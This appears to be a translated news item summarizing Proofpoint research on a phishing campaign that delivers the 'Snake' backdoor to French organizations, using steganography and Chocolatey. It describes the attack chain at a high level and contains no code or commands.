Attackers use new methods to hijack French organizations
An advanced cybercriminal has been spotted using innovative and distinctive methods to hijack French entities in the construction, real estate and government sectors.
How the attack unfolds
The attack begins with a well-known technique – emails containing a macro-enabled Microsoft Word document masquerading as GDPR-related information – and ends with an attempt to install a backdoor on the target systems. What happens between these stages, however, is what makes these attacks interesting.
Targeted recipients who download the attached Word document and enable macros trigger a chain of actions involving:
- PowerShell and Python scripts steganographically hidden in images downloaded from compromised Jamaican credit union website
- Downloading and using Chocolatey, a software management automation tool for Windows that integrates installers, executables, zips, and scripts into compiled packages
- Installing Python, Python pip package installer, and PySocks (a reverse proxy client that allows users to send traffic through SOCKS and HTTP proxy servers)
- The “Snake” backdoor, named after the ASCII art in the VBA macro
Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson say this is the first time they’ve seen a threat actor use Chocolatey in campaigns, and that steganography is, in general, rarely used by attackers. .
“In addition to the images used in this attack chain, [we] observed and identified additional payloads served from the same host. One of the most exciting is using what Proofpoint considers a new signed binary proxy runtime application using schtasks.exe,” they said. added. “This includes an attempt to circumvent detection through defensive measures.”
Researchers were unable to associate these campaigns with a known group, but the new techniques and specific targeting point to an advanced threat actor, whose ultimate goals cannot be discerned at this time.